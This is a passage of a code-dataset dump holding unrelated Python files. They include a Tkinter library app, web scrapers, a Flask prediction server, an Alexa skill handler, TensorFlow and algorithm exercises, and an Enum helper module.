unavailable!\")\r\n\t\t\troot.destroy()\r\n\t\telse:\r\n\t\t\tcur.execute(\"SELECT Book_name FROM Book_data WHERE Book_Id = (?)\", (a,))\r\n\t\t\tb_name = str(cur.fetchone()[0])\r\n\t\t\ttoday = date.today()\r\n\t\t\tcur.execute(\"SELECT Student_Id, Student_name FROM Student_record WHERE Student_Id = (?)\", 
(b,))\r\n\t\t\tdata = cur.fetchall()[0]\r\n\t\t\ts_id = int(data[0])\r\n\t\t\ts_name = str(data[1])\r\n\t\t\treissues = 0\r\n\t\t\tfine = 0.0\r\n\t\t\tif token == 0:\r\n\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\tconn.commit()\r\n\t\t\telif token == 1:\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_1 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata = int(cur.fetchone()[0])\r\n\t\t\t\tif data == 1:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_2 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telse:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\telif token == 2:\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_1 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata1 = int(cur.fetchone()[0])\r\n\t\t\t\tcur.execute(\"SELECT EXISTS (SELECT 1 FROM Book_2 WHERE Student_Id = (?))\", (s_id,))\r\n\t\t\t\tdata2 = int(cur.fetchone()[0])\r\n\t\t\t\tif data1 == 0:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_1 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telif data2 == 0:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_2 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\t\telse:\r\n\t\t\t\t\tcur.execute(\"INSERT INTO Book_3 VALUES (?, ?, ?, ?, ?, ?)\", (s_id, s_name, b_name, str(today), reissues, fine,))\r\n\t\t\t\t\tconn.commit()\r\n\t\t\ttoken = token + 1\r\n\t\t\tquan -= 1\r\n\t\t\tcur.execute(\"UPDATE Student_record SET Token = (?) WHERE Student_Id = (?)\", (token, b,))\r\n\t\t\tconn.commit()\r\n\t\t\tcur.execute(\"UPDATE Book_data SET Quantity = (?) 
WHERE Book_Id = (?)\", (quan, a,))\r\n\t\t\tconn.commit()\r\n\t\t\tmessagebox.showinfo(\"ISSUED\", \"Book Issued Successfully!\")\r\n\t\t\troot.destroy()\r\n\r\n\r\n\telif data1 != 1:\r\n\t\tmessagebox.shoerror(\"NOT FOUND\", \"Book Not Found!\")\r\n\t\troot.destroy()\r\n\r\n\telif data2 != 1:\r\n\t\tmessagebox.shoerror(\"NOT FOUND\", \"Student Record Not Found!\")\r\n\t\troot.destroy()\r\n\r\ndef issue_book():\r\n\t# Creating Window\r\n\tglobal root\r\n\tglobal Canvas1\r\n\troot = Tk()\r\n\troot.title('LIBRARY')\r\n\tscreen_width = root.winfo_screenwidth() \r\n\tscreen_height = root.winfo_screenheight() \r\n\troot.geometry(str(screen_width) + \"x\" + str(screen_height))\r\n\r\n\tCanvas1 = Canvas(root) \r\n\tCanvas1.config(bg=\"black\",width = screen_width, height = screen_height)\r\n\tCanvas1.pack(expand=True,fill=BOTH)\r\n\r\n\t# Creating Heading\r\n\theading_frame = Frame(root, bg = \"#FFC433\", bd = 5)\r\n\theading_frame.place(relx=0.215,rely=0.05,relwidth=0.6,relheight=0.15)\r\n\theading = Label(heading_frame, text = \"Welcome To Library\", bg = \"black\", fg = \"white\", font = ('courier', 50, 'bold'))\r\n\theading.place(relx=0,rely=0, relwidth=1, relheight=1)\r\n\r\n\t# Button Frame\r\n\tlogin_frame_border = Frame(root, bg = \"#FFC433\", bd = 5)\r\n\tlogin_frame_border.place(relx = 0.215, rely = 0.25, relwidth = 0.6, relheight = 0.4)\r\n\tlogin_frame = Frame(login_frame_border, bg = \"black\")\r\n\tlogin_frame.place(relx = 0, rely = 0, relwidth = 1, relheight = 1)\r\n\r\n\tbook_id = Label(login_frame, text = \"Enter Book Id : \", bg = \"black\", fg = \"white\", font = ('courier', 20, 'bold'))\r\n\tbook_id.place(relx = 0.03, rely = 0.2, relwidth = 0.45, relheight = 0.2)\r\n\tb_id_entry = Entry(login_frame, bd = 5, bg = \"white\", font = ('courier', 20, 'bold'))\r\n\tb_id_entry.place(relx = 0.53, relwidth = 0.45, rely = 0.2, relheight = 0.2)\r\n\r\n\tstd_id = Label(login_frame, text = \"Enter Student Id : \", bg = \"black\", fg = \"white\", font = ('courier', 20, 'bold'))\r\n\tstd_id.place(relx = 0.03, rely = 0.6, relwidth = 0.45, relheight = 0.2)\r\n\ts_id_entry = Entry(login_frame, bd = 5, bg = \"white\", font = ('courier', 20, 'bold'))\r\n\ts_id_entry.place(relx = 0.53, relwidth = 0.45, rely = 0.6, relheight = 0.2)\r\n\r\n\t# print(by_name_entry.get(), by_author_entry.get())\r\n\r\n\tsubmit = Button(root, text = \"Issue Book\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'), command = lambda: check_issue(int(b_id_entry.get()), int(s_id_entry.get())))\r\n\tsubmit.place(relx = 0.375, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\tmain_menu = Button(root, text = \"Go To Main Menu\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'))\r\n\tmain_menu.place(relx = 0.1, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\tclose = Button(root, text = \"Close Application\", bg = \"#FFC433\", fg = \"black\", bd = 5, font = ('courier', 20, 'bold'), command = exit)\r\n\tclose.place(relx = 0.65, rely = 0.8, relwidth = 0.25, relheight = 0.08)\r\n\r\n\t# Closing Window\r\n\troot.mainloop()","sub_path":"FINAL PROJECT/issue_options.py","file_name":"issue_options.py","file_ext":"py","file_size_in_byte":5901,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"33100020","text":"#!/usr/bin/python3\n# -*- coding: utf-8 -*-\n\n\"\"\"\nExample for how to scrape with http mode. 
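# --- Editorial sketch (not a dataset record): the parameterised-query pattern
# used throughout check_issue above, runnable against an in-memory database.
import sqlite3

conn = sqlite3.connect(':memory:')
cur = conn.cursor()
cur.execute('CREATE TABLE Book_data (Book_Id INTEGER, Quantity INTEGER)')
cur.execute('INSERT INTO Book_data VALUES (?, ?)', (1, 5))
cur.execute('UPDATE Book_data SET Quantity = Quantity - 1 WHERE Book_Id = ?', (1,))
conn.commit()
cur.execute('SELECT Quantity FROM Book_data WHERE Book_Id = ?', (1,))
assert cur.fetchone()[0] == 4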
This mode isn't quite as sophisticated as selenium mode.\n\"\"\"\n\nfrom GoogleScraper import scrape_with_config, GoogleSearchError\n\nif __name__ == '__main__':\n    # See in the config.cfg file for possible values\n    config = {\n        'SCRAPING': {\n            'keyword': 'python sucks',\n            'scrapemethod': 'http'\n        },\n        'SELENIUM': {\n            'sel_browser': 'chrome',\n            'manual_captcha_solving': 'True'\n        },\n        'GLOBAL': {\n            'do_caching': 'True',\n            'debug': '10',\n        }\n    }\n\n    try:\n        # scrape() and scrape_with_config() will return a handle to a sqlite database with the results\n        db = scrape_with_config(config)\n        print(db.execute('SELECT * FROM link').fetchall())\n\n    except GoogleSearchError as e:\n        print(e)\n\n\n","sub_path":"examples/raw_http_mode.py","file_name":"raw_http_mode.py","file_ext":"py","file_size_in_byte":898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"216106914","text":"# Author:duguiming\n# Description: exposes the model as an external API service\n# Date:2019-07-08\nimport json\nfrom predict import CNNModel\nfrom flask import Flask, request, jsonify\n\napp = Flask(__name__)\ncnn_model = CNNModel()\n\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n    res = dict()\n    if request.method == 'POST':\n        data = request.get_data()\n        json_data = json.loads(data.decode('utf-8'))\n        line = json_data['text']\n        pred_label = cnn_model.predict(line)\n        res['code'] = 200\n        res['msg'] = 'Success'\n        res['label'] = pred_label\n        return jsonify(res)\n    else:\n        res['code'] = 405\n        res['msg'] = \"Wrong request method, please use a POST request\"\n        return jsonify(res)\n\n\nif __name__ == \"__main__\":\n    app.config['JSON_AS_ASCII'] = False\n    app.run(debug=True, threaded=True, host='0.0.0.0', port=9095)\n","sub_path":"DL/TF_CNN_RNN/server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":859,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"224773655","text":"\"\"\"\nTest module.\nRuns all tests.\n\"\"\"\n\nimport sys\nimport unittest\n\n\ndef main():\n    exit_code = 0\n    test_result = _run_test_suite('test', '*_test.py')\n\n    if test_result.errors or test_result.failures:\n        exit_code = 1\n\n    sys.exit(exit_code)\n\n\ndef _run_test_suite(directory, pattern):\n    loader = unittest.TestLoader()\n    runner = unittest.TextTestRunner(verbosity=2)\n    suite = loader.discover(directory, pattern)\n\n    return runner.run(suite)\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"src/test_runner.py","file_name":"test_runner.py","file_ext":"py","file_size_in_byte":497,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"152949036","text":"from __future__ import print_function\nimport urllib\nimport urllib2\nimport xml.etree.ElementTree\nimport os\nimport base64\n\n# -------------- Helpers for O*NET Web Services --------------------------------\n\ndef add_onet_authorization(req):\n    auth_str = os.environ['onet_web_services_username'] + \\\n               ':' + \\\n               os.environ['onet_web_services_password']\n    req.add_header('Authorization', 'Basic ' + \\\n                   base64.b64encode(auth_str))\n\ndef call_onet_service(path, params=None):\n    url = 'https://services.onetcenter.org/ws/' + path\n    if params is not None:\n        url += '?' 
+ urllib.urlencode(params)\n req = urllib2.Request(url)\n add_onet_authorization(req)\n response = urllib2.urlopen(req)\n return xml.etree.ElementTree.fromstring(response.read())\n\n\n# --------------- Helpers that build all of the responses ----------------------\n\ndef build_speechlet_response(title, output, reprompt_text, should_end_session):\n return {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': output\n },\n 'card': {\n 'type': 'Simple',\n 'title': \"SessionSpeechlet - \" + title,\n 'content': \"SessionSpeechlet - \" + output\n },\n 'reprompt': {\n 'outputSpeech': {\n 'type': 'PlainText',\n 'text': reprompt_text\n }\n },\n 'shouldEndSession': should_end_session\n }\n\n\ndef build_response(session_attributes, speechlet_response):\n return {\n 'version': '1.0',\n 'sessionAttributes': session_attributes,\n 'response': speechlet_response\n }\n\n\n# --------------- Functions that control the skill's behavior ------------------\n\ndef get_on_the_job_response(intent, session):\n \"\"\" Reads tasks from the requested career.\n \"\"\"\n\n card_title = intent['name']\n session_attributes = {}\n should_end_session = False\n\n if 'Career' in intent['slots'] and intent['slots']['Career']['value']:\n career_name = intent['slots']['Career']['value']\n \n search_res = call_onet_service('mnm/search', {'keyword': career_name})\n onet_code = search_res.find('career').find('code').text\n career_res = call_onet_service('mnm/careers/' + onet_code + '/')\n onet_title = career_res.find('title').text\n \n card_title = \"What \" + onet_title + \" do on the job\"\n speech_output = \"On the job, \" + onet_title + \" will:\"\n for task_el in career_res.find('on_the_job').findall('task'):\n speech_output += \" \" + task_el.text\n should_end_session = True\n else:\n speech_output = \"I didn't understand that career. \" \\\n \"Please try again.\"\n \n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n\ndef get_welcome_response():\n \"\"\" If we wanted to initialize the session to have some attributes we could\n add those here\n \"\"\"\n\n session_attributes = {}\n card_title = \"Welcome\"\n speech_output = \"Welcome to the O*NET Demo skill. 
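The O*NET record above builds the HTTP Basic-auth header by hand with urllib2 and base64. As a sketch that is not part of the record, the same call in Python 3 with the `requests` library, which encodes both the credentials and the query string itself:

```python
# Hypothetical Python 3 counterpart of call_onet_service above; requests
# builds the Basic-auth header and URL-encodes params for us.
import os
import xml.etree.ElementTree as ET
import requests

def call_onet_service_py3(path, params=None):
    response = requests.get(
        'https://services.onetcenter.org/ws/' + path,
        params=params,
        auth=(os.environ['onet_web_services_username'],
              os.environ['onet_web_services_password']),
    )
    response.raise_for_status()  # surface HTTP errors instead of parsing bad XML
    return ET.fromstring(response.content)
```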
\" \\\n \"Please ask me about a career by saying, \" \\\n \"what does an architect do?\"\n # If the user either does not reply to the welcome message or says something\n # that is not understood, they will be prompted again with this text.\n reprompt_text = \"Please ask me about a career by saying, \" \\\n \"what does an architect do?\"\n should_end_session = False\n return build_response(session_attributes, build_speechlet_response(\n card_title, speech_output, reprompt_text, should_end_session))\n\n\ndef handle_session_end_request():\n card_title = \"Session Ended\"\n speech_output = \"Thank you for trying the O*NET Demo skill.\"\n # Setting this to true ends the session and exits the skill.\n should_end_session = True\n return build_response({}, build_speechlet_response(\n card_title, speech_output, None, should_end_session))\n\n# --------------- Events ------------------\n\ndef on_session_started(session_started_request, session):\n \"\"\" Called when the session starts \"\"\"\n\n print(\"on_session_started requestId=\" + session_started_request['requestId']\n + \", sessionId=\" + session['sessionId'])\n\n\ndef on_launch(launch_request, session):\n \"\"\" Called when the user launches the skill without specifying what they\n want\n \"\"\"\n\n print(\"on_launch requestId=\" + launch_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # Dispatch to your skill's launch\n return get_welcome_response()\n\n\ndef on_intent(intent_request, session):\n \"\"\" Called when the user specifies an intent for this skill \"\"\"\n\n print(\"on_intent requestId=\" + intent_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n\n intent = intent_request['intent']\n intent_name = intent_request['intent']['name']\n\n # Dispatch to your skill's intent handlers\n if intent_name == \"OnTheJobIntent\":\n return get_on_the_job_response(intent, session)\n elif intent_name == \"AMAZON.HelpIntent\":\n return get_welcome_response()\n elif intent_name == \"AMAZON.CancelIntent\" or intent_name == \"AMAZON.StopIntent\":\n return handle_session_end_request()\n else:\n raise ValueError(\"Invalid intent: \" + intent_name)\n\n\ndef on_session_ended(session_ended_request, session):\n \"\"\" Called when the user ends the session.\n\n Is not called when the skill returns should_end_session=true\n \"\"\"\n print(\"on_session_ended requestId=\" + session_ended_request['requestId'] +\n \", sessionId=\" + session['sessionId'])\n # add cleanup logic here\n\n\n# --------------- Main handler ------------------\n\ndef lambda_handler(event, context):\n \"\"\" Route the incoming request based on type (LaunchRequest, IntentRequest,\n etc.) 
The JSON body of the request is provided in the event parameter.\n    \"\"\"\n    print(\"event.session.application.applicationId=\" +\n          event['session']['application']['applicationId'])\n\n    \"\"\"\n    Uncomment this if statement and populate with your skill's application ID to\n    prevent someone else from configuring a skill that sends requests to this\n    function.\n    \"\"\"\n    # if (event['session']['application']['applicationId'] !=\n    #         \"amzn1.echo-sdk-ams.app.[unique-value-here]\"):\n    #     raise ValueError(\"Invalid Application ID\")\n\n    if event['session']['new']:\n        on_session_started({'requestId': event['request']['requestId']},\n                           event['session'])\n\n    if event['request']['type'] == \"LaunchRequest\":\n        return on_launch(event['request'], event['session'])\n    elif event['request']['type'] == \"IntentRequest\":\n        return on_intent(event['request'], event['session'])\n    elif event['request']['type'] == \"SessionEndedRequest\":\n        return on_session_ended(event['request'], event['session'])\n","sub_path":"sample-onet-demo/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":6940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"77489672","text":"# Store extracted frames separately, using each video's name as the folder\nimport glob,os\nimport argparse\n\nparser = argparse.ArgumentParser()\nparser.add_argument('--mp4-path', type=str, required=True)\nparser.add_argument('--img-path', type=str, required=True)\nargs = parser.parse_args()\n\n\nif not os.path.exists(args.img_path):\n    os.mkdir(args.img_path)\nnew_name = args.mp4_path + '/*.mp4'\nvideo_lists = sorted(glob.glob(new_name))\nfor video in video_lists:\n    video_name = video.split('/')[-1]\n    video_name = video_name.split('.')[0]\n    img_folder = os.path.join(args.img_path,video_name)\n    if not os.path.exists(img_folder):\n        os.mkdir(img_folder)\n    command = 'ffmpeg -i {0} -vsync 0 {1}/%3d.png -y'.format(video, img_folder)\n    os.system(command)\n\n#python3 video2img.py --mp4-path ./SDR_540p --img-path ./data/test_lr\n#python3 video2img.py --mp4-path ./videos/gt --img-path ./data/hr\n#python3 video2img.py --mp4-path ./videos/X4 --img-path ./data/lr","sub_path":"RCAN_PyTorch/video2img.py","file_name":"video2img.py","file_ext":"py","file_size_in_byte":941,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"}
+{"seq_id":"501098355","text":"import os\nimport string\nimport requests\nfrom bs4 import BeautifulSoup\n\n# ?searchType=journalSearch&sort=PubDate&page=2\n\ndef main():\n    num_pages = int(input())\n    article_type = input()\n    page_count = 1\n    url = \"\"\n\n    while page_count <= num_pages:\n        if page_count == 1:\n            url = \"https://www.nature.com/nature/articles\"\n        else:\n            url = \\\n                f\"https://www.nature.com/nature/articles?searchType=journalSearch&sort=PubDate&page={page_count}\"\n\n        r = requests.get(url)\n\n        if r.status_code == 200:\n            soup = BeautifulSoup(r.content, 'html.parser')\n\n            articles = soup.find_all('article')\n\n            os.mkdir(f\"Page_{page_count}\")\n            # scrape the page for the article type\n            for article in articles:\n                type = article.select_one('[data-test=\"article.type\"]')\n\n                if type:\n                    type = type.text.strip()\n\n                    if type == article_type:\n                        print(\"article type found: \" + type)\n                        # str.replace(string.punctuation, '') only matches the whole punctuation\n                        # string, so strip punctuation char-by-char via translate, and do it\n                        # before replacing spaces so the underscores survive\n                        title = article.select_one('h3.c-card__title').text.lower().strip().translate(str.maketrans('', '', string.punctuation)).replace(' ', '_')\n                        article_link = article.select_one('a').get('href')\n                        print(\"Article link: \" + article_link)\n                        article_request = requests.get(\"https://www.nature.com\" + article_link)\n\n                        if 
article_request.status_code == 200:\n print(\"Fetched the articles content\")\n article_content = BeautifulSoup(article_request.content, 'html.parser')\n article_body = article_content.find('div', attrs={'class':'article-item__body'})\n\n if article_body:\n print(os.getcwd())\n file_name = title + '.txt'\n file_path = os.getcwd() + '\\\\' + f\"Page_{page_count}\"\n save_path = os.path.join(file_path, file_name)\n\n article_binary = bytes(article_body.text.strip(), 'utf-8')\n print(title)\n file = open(save_path, 'wb')\n # file = open(title + '.txt', 'wb')\n file.write(article_binary)\n file.close()\n print('Finished writing to file')\n else:\n article_body = article_content.find('div', attrs={'class':'c-article-body'})\n if article_body:\n print(os.getcwd())\n file_name = title + '.txt'\n file_path = os.getcwd() + '\\\\' + f\"Page_{page_count}\"\n save_path = os.path.join(file_path, file_name)\n\n article_binary = bytes(article_body.text.strip(), 'utf-8')\n print(title)\n file = open(save_path, 'wb')\n # file = open(title + '.txt', 'wb')\n file.write(article_binary)\n file.close()\n print('Finished writing to file')\n else:\n print('There was an issue navigating to the news article')\n # else:\n # print('No news article was found')\n page_count += 1\n\n\nmain()\n\n\n","sub_path":"web-scraper.py","file_name":"web-scraper.py","file_ext":"py","file_size_in_byte":3698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"194788176","text":"\nclass Solution:\n\n def maxDistance(self, arrays) -> int:\n\n # [[1,2,3], [4,5], [1,2,3]]\n # i = 0, cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 3, min_dist = None, max_dist = None\n # i = 1, cur_min = 4, cur_max = 5, tot_min = 1, tot_max = 3, min_dis = abs(3-4), max_dist = abs(5-1)\n # i = 2, cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 5, min_dis = abs(5-1), max_dist = abs(3-1)\n # general: cur_min = 1, cur_max = 3, tot_min = 1, tot_max = 5, min_dis = abs(tot_max-cur_min), max_dist = abs(cur_max-tot_min)\n\n # [[1,4], [0,5]], expected = 4\n # i = 0, min = 1, max = 4, min_dist = None, max_dist = None\n # i = 1, min = 1, max = 5, min_dis = abs(0-4), max_dist = abs(5-1)\n # i = 2, min = 1, max = 5\n # distance = max - min = 4\n\n # [[-1, 1], [-3, 1, 4], [-2, -1, 0, 2]], expected = 6\n # i = 0, cur_min = -1, cur_max = 1, min_dist = None, max_dist = None\n # i = 1, cur_min = -3, cur_max = 4, min_dis = abs(1-(-3)), max_dist = abs(4-(-1)), dist = 5\n # i = 2, cur_min = -2, cur_max = 2, min_dis = abs(4-(-2))\n # distance = max - min = 4\n\n tot_max = tot_min = None\n distance = min_dist = max_dist = 0\n\n for i in range(len(arrays)):\n array = arrays[i]\n cur_min = array[0]\n cur_max = array[len(array) - 1]\n\n if tot_min != None:\n min_dist = abs(tot_max - cur_min)\n max_dist = abs(cur_max - tot_min)\n if distance < min_dist:\n distance = min_dist\n if distance < max_dist:\n distance = max_dist\n\n if tot_min == None or cur_min < tot_min:\n tot_min = cur_min\n\n if tot_max == None or cur_max > tot_max:\n tot_max = cur_max\n\n return distance\n\n","sub_path":"max_dist_in_arrays/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":1860,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"472497037","text":"import tensorflow as tf\nfrom housing import HousingPrice\n\nX_train, X_test, y_train, y_test = HousingPrice().prepare_data()\n\nX = tf.placeholder(shape=(None, X_train.shape[1]), dtype=tf.float32, name=\"X\")\ny = 
tf.placeholder(shape=(None, 1), dtype=tf.float32, name=\"y\")\n\ntheta = tf.Variable(tf.random_uniform([X_train.shape[1], 1], -1.0, 1.0, seed=42), dtype=tf.float32, name=\"theta\")\ny_pred = tf.matmul(X, theta, name=\"predictions\")\nerror = y_pred - y\nmse = tf.reduce_mean(tf.square(error), name=\"mse\")\noptimizer = tf.train.GradientDescentOptimizer(learning_rate=0.01)\nconfig = tf.ConfigProto()\nconfig.log_device_placement = True\ninit = tf.global_variables_initializer()\ntraining_op = optimizer.minimize(mse)\nwith tf.Session(config=config) as sess:\n init.run()\n sess.run(training_op, feed_dict={X: X_train, y: y_train.reshape(-1,1)})\n print(theta.eval())\n save_path = tf.train.Saver().save(sess, \"../model/024.ckpt\")\n\n\n\n\n","sub_path":"src/024_Tensorflow_02.py","file_name":"024_Tensorflow_02.py","file_ext":"py","file_size_in_byte":931,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"476823254","text":"from linkedList import Node, SinglyLinkedList\n\n\ndef sum_lists(list1, list2):\n list1_int = list_to_int(list1)\n list2_int = list_to_int(list2)\n sum_of_lists = int(list1_int) + int(list2_int)\n sum_of_lists_string = str(sum_of_lists)\n\n new_list = Node()\n head = new_list\n\n for ch in sum_of_lists_string[::-1]:\n new_node = Node(data=ch)\n new_list.next = new_node\n new_list = new_list.next\n\n final_list = SinglyLinkedList()\n final_list.root = head.next\n\n return final_list\n\n\ndef list_to_int(input_list):\n list_stack = list()\n curr = input_list.root\n while curr:\n list_stack.append(curr.data)\n curr = curr.next\n\n tmp_int = \"\"\n while list_stack:\n tmp_int += str(list_stack.pop())\n return tmp_int\n\n\nif __name__ == \"__main__\":\n list1 = SinglyLinkedList()\n list1.insert(7)\n list1.insert(1)\n list1.insert(6)\n print(list1)\n list2 = SinglyLinkedList()\n list2.insert(5)\n list2.insert(9)\n list2.insert(2)\n print(list2)\n new_list = sum_lists(list1, list2)\n print(new_list)\n","sub_path":"CTCI/Chap_2/sum_lists.py","file_name":"sum_lists.py","file_ext":"py","file_size_in_byte":1082,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"463129032","text":"# -*- coding: utf-8 -*-\n#\n# Copyright (C) 2015 Rodrigo Silva (MestreLion) \n#\n# This program is free software: you can redistribute it and/or modify\n# it under the terms of the GNU General Public License as published by\n# the Free Software Foundation, either version 3 of the License, or\n# (at your option) any later version.\n#\n# This program is distributed in the hope that it will be useful,\n# but WITHOUT ANY WARRANTY; without even the implied warranty of\n# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n# GNU General Public License for more details.\n#\n# You should have received a copy of the GNU General Public License\n# along with this program. 
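The TensorFlow 1.x housing record above runs training_op through sess.run() exactly once, so theta barely moves from its random initialization. A hedged sketch of the usual multi-epoch variant, reusing the graph nodes defined in that snippet (the epoch count and logging interval are assumptions):

```python
# Hypothetical multi-epoch loop over the training_op/mse nodes defined in
# the housing-price snippet above; logs the MSE every 100 steps.
n_epochs = 1000
with tf.Session(config=config) as sess:
    init.run()
    for epoch in range(n_epochs):
        _, mse_val = sess.run(
            [training_op, mse],
            feed_dict={X: X_train, y: y_train.reshape(-1, 1)})
        if epoch % 100 == 0:
            print(epoch, "MSE =", mse_val)
    print(theta.eval())
```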
See \n\n'''Basic implementation of enum module for Python 2 and 3'''\n\n__all__ = ['Enum'] # not necessary as Enum is the only non-__*__ name\n\nimport sys\n\nclass _meta(type):\n @property\n def __members__(self):\n return {k: v for k, v in self.__dict__.items()\n if not k.startswith(\"_\")\n and not self._callable(getattr(self, k))}\n\n def __iter__(self):\n '''Yield members sorted by value, not declaration order'''\n return iter(sorted(self.__members__.values()))\n\n def __reversed__(self):\n '''Yield members sorted by descending value order'''\n return reversed(tuple(self))\n # tuple() is required to create a sequence out of the Enum\n\n def __getitem__(self, k):\n try:\n return self.__members__[k]\n except KeyError:\n # re-raise as AttributeError, for consistency with Enum.VALUE\n raise AttributeError(\"type object '{}' has no attribute '{}'\".\n format(self.__name__, k))\n\n def __contains__(self, k):\n return k in self.__members__\n\n def __len__(self):\n return len(self.__members__)\n\n\nclass _base(object):\n @staticmethod\n def _callable(obj):\n '''Helper wrapper for callable() that works on Python 3.0 and 3.1'''\n try:\n return callable(obj)\n except NameError:\n # Python 3.0 and 3.1 has no callable()\n # which is a tiny safer than hasattr approach\n return hasattr(obj, \"__call__\")\n\n @classmethod\n def name(cls, value):\n '''\n Fallback for getting a friendly member name\n Return a titled string with underscores replaced by spaces\n AnEnum.name(AnEnum.AN_ORDINARY_MEMBER) => \"An Ordinary Member\"\n Enums can customize member names by overriding this method\n '''\n # value not handled in subclass name()\n for k, v in cls.__members__.items():\n if v == value:\n return k.replace('_', ' ').title()\n\n # Value not find. Try again using value as member name.\n # Allows usage as Enum.name(\"VALUE\") besides Enum.name(Enum.VALUE)\n return cls.name(cls[value])\n\n @classmethod\n def members(cls):\n '''\n Return a list of member attribute names (strings),\n ordered by value to make it consistent with class iterator\n '''\n return sorted(cls.__members__, key=cls.__members__.get)\n\n\n# Python 2\nif sys.version_info[0] < 3:\n class Enum(_base):\n '''A basic implementation of Enums for Python 2'''\n __metaclass__ = _meta\n\n# Python 3\nelse:\n # Python 2 see Python 3 metaclass declaration as SyntaxError, hence exec()\n exec(\"class Enum(_base, metaclass=_meta):\"\n \"'''A basic implementation of Enums for Python 3'''\")\n\ndel sys, _base, _meta\n\n\nif __name__ == '__main__':\n # Usage and Examples\n\n class Color(Enum):\n '''Enum class example'''\n\n # Declaration order is irrelevant, sorting will always be by value\n # Values can be any non-callable, and in Python 3 must be comparable\n # Bottom line: don't make an Enum of functions,\n # and don't mix numbers with strings\n BLACK = 0\n WHITE = 10 # This will sort last\n DEFAULT = -1 # This will sort first\n RED = 1\n GREEN = 2\n BLUE = 3\n NICE_ONE = 4\n\n # Methods are not considered members\n # That's why member values cannot be callables\n\n @classmethod\n def name(cls, v):\n '''Optional custom name function'''\n if v == cls.BLACK: return \"is back!\"\n if v == cls.WHITE: return \"Delight\"\n\n # Uses default name as fallback for members not listed above\n return super(Color, cls).name(v)\n\n @classmethod\n def counterpart(cls, v):\n '''Custom method example'''\n if v == cls.DEFAULT: return v\n if v == cls.BLACK: return cls.WHITE\n if v == cls.WHITE: return cls.BLACK\n\n return v + 1 if v + 1 in cls else cls.DEFAULT\n\n # Value and 
types\n    print(Color.RED, Color[\"RED\"], type(Color.RED))  # 1, 1, \n\n    # Testing values\n    print(\"Red is the new Black?\",\n          Color.BLACK == 1,  # False\n          Color.BLACK == 0)  # True\n\n    # Names\n    print(Color.name(1))               # \"Red\"\n    print(Color.name(\"GREEN\"))         # \"Green\"\n    print(Color.name(Color.BLUE))      # \"Blue\"\n    print(Color.name(Color.NICE_ONE))  # \"Nice One\"\n\n    # Custom names\n    print(\"Black\", Color.name(Color.BLACK),  # \"is back!\"\n          \"White\", Color.name(\"WHITE\"))      # \"Delight\"\n\n    # Membership\n    print(\"is green a color?\", Color.GREEN in Color)  # True\n\n    # Iterating the class yields values,\n    # iterating on members() yields member attribute names (as strings)\n    # Both automatically sorted by value, for consistency with each other\n    for color, member in zip(Color, Color.members()):\n        print(color, member, Color.name(color))\n\n    # Custom methods\n    for color in Color:\n        print(Color.name(color), \"<=>\", Color.name(Color.counterpart(color)))\n\n    # Adding and removing members\n    Color.YELLOW = 5\n    del Color.NICE_ONE\n\n    # Member count\n    print(\"colors in a rainbow:\", len(Color))  # 7\n\n    # Using internal dict\n    print(\"members dict:\", Color.__members__)\n\n    # Handling exceptions\n    try:\n        print(Color.BROWN)\n    except Exception as e:\n        print(repr(e))  # AttributeError\n    try:\n        print(Color['BROWN'])\n    except Exception as e:\n        print(repr(e))  # Also AttributeError, for consistency\n    try:\n        print(Color['name'])  # 